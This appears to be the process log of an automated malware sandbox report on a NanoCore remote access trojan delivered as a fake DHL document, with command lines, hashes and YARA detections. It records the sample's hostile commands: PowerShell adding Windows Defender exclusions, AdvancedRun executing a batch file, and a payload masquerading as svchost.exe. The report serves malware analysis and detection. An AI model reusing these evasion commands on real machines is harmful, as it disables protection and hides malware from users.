                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe' -Force
                                                                                                                                        Imagebase:0x12f0000
                                                                                                                                        File size:430592 bytes
                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:45
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:46
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:91000 bytes
                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 3%, Metadefender, Browse
                                                                                                                                        • Detection: 0%, ReversingLabs
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:11:04:53
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:54
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Users\user\AppData\Local\Temp\ca310657-9b53-4e0b-a10e-ddb725ebbc7d\AdvancedRun.exe' /SpecialRun 4101d8 1864
                                                                                                                                        Imagebase:0x400000
                                                                                                                                        File size:91000 bytes
                                                                                                                                        MD5 hash:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:moderate

                                                                                                                                        General

                                                                                                                                        Start time:11:04:55
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                        Reputation:high

                                                                                                                                        General

                                                                                                                                        Start time:11:04:56
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:04:59
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
                                                                                                                                        Imagebase:0x9f0000
                                                                                                                                        File size:61312 bytes
                                                                                                                                        MD5 hash:5E86EC60BC329DB96BE8D476537A554C
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: NanoCore, Description: unknown, Source: 00000011.00000002.544943741.000000000430F000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                        Antivirus matches:
                                                                                                                                        • Detection: 100%, Joe Sandbox ML
                                                                                                                                        • Detection: 33%, ReversingLabs

                                                                                                                                        General

                                                                                                                                        Start time:11:05:01
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\DHL_document1102202068090891.exe' -Force
                                                                                                                                        Imagebase:0x12f0000
                                                                                                                                        File size:430592 bytes
                                                                                                                                        MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET

                                                                                                                                        General

                                                                                                                                        Start time:11:05:01
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:01
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\System32\cmd.exe' /c timeout 1
                                                                                                                                        Imagebase:0x1390000
                                                                                                                                        File size:232960 bytes
                                                                                                                                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:01
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:02
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:02
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\timeout.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:timeout 1
                                                                                                                                        Imagebase:0xb60000
                                                                                                                                        File size:26112 bytes
                                                                                                                                        MD5 hash:121A4EDAE60A7AF6F5DFA82F7BB95659
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:03
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:05
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\explorer.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                        Imagebase:0x7ff693d90000
                                                                                                                                        File size:3933184 bytes
                                                                                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:07
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:08
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:'C:\Windows\Cursors\HbzxlmpZrwoQrExpYSCweYrh\svchost.exe'
                                                                                                                                        Imagebase:0xad0000
                                                                                                                                        File size:61312 bytes
                                                                                                                                        MD5 hash:5E86EC60BC329DB96BE8D476537A554C
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: NanoCore, Description: unknown, Source: 0000001C.00000002.543251582.00000000047D4000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                                                                        General

                                                                                                                                        Start time:11:05:12
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe
                                                                                                                                        Imagebase:0x6a0000
                                                                                                                                        File size:107624 bytes
                                                                                                                                        MD5 hash:F866FC1C2E928779C7119353C3091F0C
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET
                                                                                                                                        Yara matches:
                                                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.529223776.0000000002D91000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: NanoCore, Description: unknown, Source: 0000001D.00000002.504221137.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                        • Rule: NanoCore, Description: unknown, Source: 0000001D.00000002.533736388.0000000003DD9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001D.00000002.539788145.0000000005370000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                                                        • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000001D.00000002.540084949.0000000005AE0000.00000004.00000001.sdmp, Author: Joe Security

                                                                                                                                        General

                                                                                                                                        Start time:11:05:13
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:14
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 5308 -ip 5308
                                                                                                                                        Imagebase:0xd60000
                                                                                                                                        File size:434592 bytes
                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:16
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 5308 -s 2256
                                                                                                                                        Imagebase:0xd60000
                                                                                                                                        File size:434592 bytes
                                                                                                                                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:.Net C# or VB.NET

                                                                                                                                        General

                                                                                                                                        Start time:11:05:20
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                        Imagebase:0x7ff797770000
                                                                                                                                        File size:51288 bytes
                                                                                                                                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:true
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:35
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                                                                        Imagebase:0x7ff70d9f0000
                                                                                                                                        File size:455656 bytes
                                                                                                                                        MD5 hash:A267555174BFA53844371226F482B86B
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        General

                                                                                                                                        Start time:11:05:35
                                                                                                                                        Start date:25/02/2021
                                                                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                        Imagebase:0x7ff7ecfc0000
                                                                                                                                        File size:625664 bytes
                                                                                                                                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                                        Has elevated privileges:true
                                                                                                                                        Has administrator privileges:false
                                                                                                                                        Programmed in:C, C++ or other language

                                                                                                                                        Disassembly

                                                                                                                                        Code Analysis

                                                                                                                                        Reset < >